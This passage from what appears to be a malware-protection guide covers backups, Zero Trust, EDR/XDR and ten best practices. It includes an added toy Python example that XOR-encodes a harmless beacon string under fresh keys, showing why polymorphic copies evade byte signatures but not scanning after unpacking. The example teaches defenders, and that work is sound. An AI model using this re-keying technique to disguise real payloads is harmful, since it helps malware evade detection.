Teams. As part of Microsoft 365 Defender, Defender for
Office 365 offers detection and response capabilities to
eliminate the threat of malware attacks.
Also a part of Microsoft 365 Defender, Microsoft Defender
for Endpoint uses endpoint behavioural sensors, cloud
security analytics, and threat intelligence to help
organizations prevent, detect, investigate, and respond to
advanced threats.
• Hold regular training sessions
Keep employees informed about how to spot the signs of phishing
and other cyber-attacks with regular training. This teaches safer
practices not only for work but also for their personal devices.
Simulation and training tools, like the attack simulation
training in Defender for Office 365, simulate real-world threats
in your environment and assign training to end users based on the
simulation results.
• Take advantage of cloud backups
Moving data to a cloud-based service makes it easy to back it up
for safer keeping. If data is compromised by malware, these
services can make recovery fast and complete, provided the backups
are versioned or immutable: a sync client that mirrors every
change will faithfully replicate encrypted files, so keep
point-in-time copies that the infected machine cannot overwrite.
• Adopt a Zero Trust model
A Zero Trust model evaluates every device and user for risk
before permitting access to applications, files, databases and
other devices, decreasing the likelihood that a malicious identity
or device could reach resources and install malware. As an
example, Microsoft reports that multifactor authentication, one
component of a Zero Trust model, reduces the effectiveness of
identity attacks by more than 99%.
• Join an information-sharing group
Information-sharing groups, frequently organized by
industry or geographic location, encourage similarly
structured organizations to work together toward cyber
security solutions. The groups also offer organizations
different benefits, such as incident response and digital
forensics services, news about the latest threats, and
monitoring of public IP ranges and domains.
• Maintain offline backups
Because some malware will try to seek out and delete any
online backups you may have, it’s a good idea to keep an
updated offline backup of sensitive data that you regularly
test to make sure it’s restorable if you’re ever hit by a
malware attack.
• Keep software up to date
In addition to keeping any antivirus solutions updated
(consider choosing automatic updates), be sure to download
and install any other system updates and software patches
as soon as they’re available. This helps minimize any
security vulnerabilities that a cybercriminal might exploit to
gain access to your network or devices.
• Create an incident response plan
Just like having an emergency plan in place for how to exit
your home if there’s a fire keeps you safer and more
prepared, creating an incident response plan for what to do
if you’ve been hit with a malware attack will provide you
with actionable steps to take in different attack scenarios so
that you can get back to running normally and safely as soon
as possible.
Types of advanced malware protection
Prevention
Traditional antivirus (AV) software relies heavily on detecting a
virus's signature, a fixed binary pattern, to identify malware and
prevent damage. Malware authors stay a step ahead of such software
by writing oligomorphic, polymorphic and, more recently,
metamorphic code, which uses obfuscation techniques such as
encrypting parts of itself under a fresh key for every copy, or
rewriting its own instructions, so that no copy matches the
signatures in the antivirus database.
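To make the previous paragraph concrete, here is an added example that is not part of the report or of any vendor's product. A constructed, harmless "payload" string stands in for a malware body; it is XOR-encoded under a fresh random key for each copy, the way a polymorphic packer wraps its body. Every copy has a different hash and no longer contains the signature bytes, yet decoding it (what the unpacking stub does at run time) yields the identical payload, which is why detection has to look at what runs rather than at what is stored. The payload, the signature and the key length of eight bytes are all assumptions of the example; a real packer also varies the stub, which a toy XOR does not show.

```python
# Added example (not from the original report): why a byte-pattern signature
# misses a re-keyed copy, and why scanning after unpacking still catches it.
import hashlib
import random

PAYLOAD = b"GET /beacon HTTP/1.1\r\nHost: 203.0.113.10\r\n\r\n"  # constructed body
SIGNATURE = b"/beacon HTTP"   # byte pattern a traditional AV signature would key on
KEY_LEN = 8                   # assumed key size for the toy packer


def xor_encode(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; encoding and decoding are the same operation."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def make_variant(seed: int) -> bytes:
    """Return key || encoded payload. A new seed gives a new key, hence new bytes."""
    rng = random.Random(seed)
    key = bytes(rng.getrandbits(8) for _ in range(KEY_LEN))
    return key + xor_encode(PAYLOAD, key)


def signature_match(sample: bytes) -> bool:
    """What signature-based AV does: look for the known bytes in the file."""
    return SIGNATURE in sample


def unpack(sample: bytes) -> bytes:
    """What the stub does at execution time: recover the body from key || body."""
    key, body = sample[:KEY_LEN], sample[KEY_LEN:]
    return xor_encode(body, key)


def detect_after_unpack(sample: bytes) -> bool:
    """Scan the bytes that would actually run, not the bytes on disk."""
    return signature_match(unpack(sample))


VARIANTS = [make_variant(seed) for seed in range(1, 6)]

if __name__ == "__main__":
    print("plain payload matches signature:", signature_match(PAYLOAD))
    for v in VARIANTS:
        print(hashlib.sha256(v).hexdigest()[:16],
              "on-disk match:", signature_match(v),
              "after unpack:", detect_after_unpack(v))
```

Each line prints a different hash with `on-disk match: False` and `after unpack: True`. Emulating the unpacking is what "behaviour-based" and sandbox detection do in practice; the signature was never wrong, it was just applied to the wrong bytes.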
Endpoint security that employs advanced malware protection blocks
known malware and exploits accurately and efficiently without
depending solely on signatures. By contrast, legacy AV solutions
can be blind to malware inside zip and other archive formats, as
well as to fileless malware, and fail to catch advanced threats.
Detection
Around 2013, the security industry's focus began to shift toward
signature-less approaches to antivirus protection. Traditional
antivirus may struggle to detect low-prevalence threats, which
never accumulate enough samples to earn a signature. Endpoint
security that continuously monitors all file activity detects new
threats faster.
New antivirus capabilities were developed to detect and mitigate
zero-day attacks and other, more sophisticated malware. Some of
these next-generation capabilities include:
• Behaviour-based malware detection, which builds full context
around every process execution path in real time
• Machine learning models and other forms of artificial
intelligence, which identify patterns that match known malware
characteristics
Response
More effective response methods are now found in advanced
malware protection solutions such as endpoint detection and
response (EDR) and, more recently, extended detection and
response (XDR) tools. Unlike traditional endpoint security, these
solutions also provide retrospective security: they keep a record
of every file seen on every endpoint, so that when a file is later
judged malicious, every machine that received it can be identified
and the threat contained at the first sign of malicious behaviour.
Efficiency
Legacy antivirus deployments often require complex
configuration and management. Advanced malware protection
solutions provide prevention, detection, and response all in one
solution and are generally highly automated. Their built-in, open
platforms enable much simpler and more efficient workflows.
10 malware protection best practices
1. Update your frontline defenses
Adhere to policies and best practices for application, system and
appliance security. Use unique passwords of at least 16 characters
and a password manager. Patch systems quickly: once a fix is
released, attackers compare the patched and unpatched versions and
the flaw quickly becomes well known.
2. Back up data and test restore procedures
Backup processes are critical to protecting against data loss.
With fast-moving, network-based ransomware worms and destructive
cyber-attacks, a data protection solution is a necessity, and the
restore procedure must be exercised regularly, since a backup that
has never been restored is not known to be restorable.
3. Protect against malware
Take a layered approach with next-generation endpoint monitoring
tools such as AMP for Endpoints, next-generation firewalls (NGFW)
and an intrusion prevention system (IPS), so that security is
deployed from the endpoint to email to the DNS layer.
4. Educate users on threat sources
Train users on whom and what to trust and teach them not to fall
for phishing or other schemes. Have them enable two-factor
authentication as a first line of defense.
5. Partition your network
Reduce the blast radius of an outbreak by isolating parts of your
network from one another with network segmentation.
6. Leverage email security
Most ransomware infections are spread through an email
attachment or malicious download. Diligently block malicious
websites, emails, and attachments through a layered security
approach and a company-sanctioned file-sharing program.
7. Use security analytics
Closely monitor your network traffic by performing deeper and
more advanced analytics to see everything happening across your
network. Leverage real-time threat intelligence from
organizations such as Talos to better understand security
information and emerging cyber security threats.
8. Create a set of instructions for IT staff
Review and practice security response procedures by developing
an incident response plan.
9. Practice prevention and remediation
Learn about and consider additional security solutions that will
further protect your network as well as expand your company's
visibility. Conduct security scanning of microservice, cloud
service, and application administration systems.
10. Deploy a zero-trust security framework
This approach helps secure access from users, end-user devices,
APIs, IoT, microservices, containers and more. It protects your
workforce, workloads and workplace, since each must first prove
its trustworthiness before being granted access.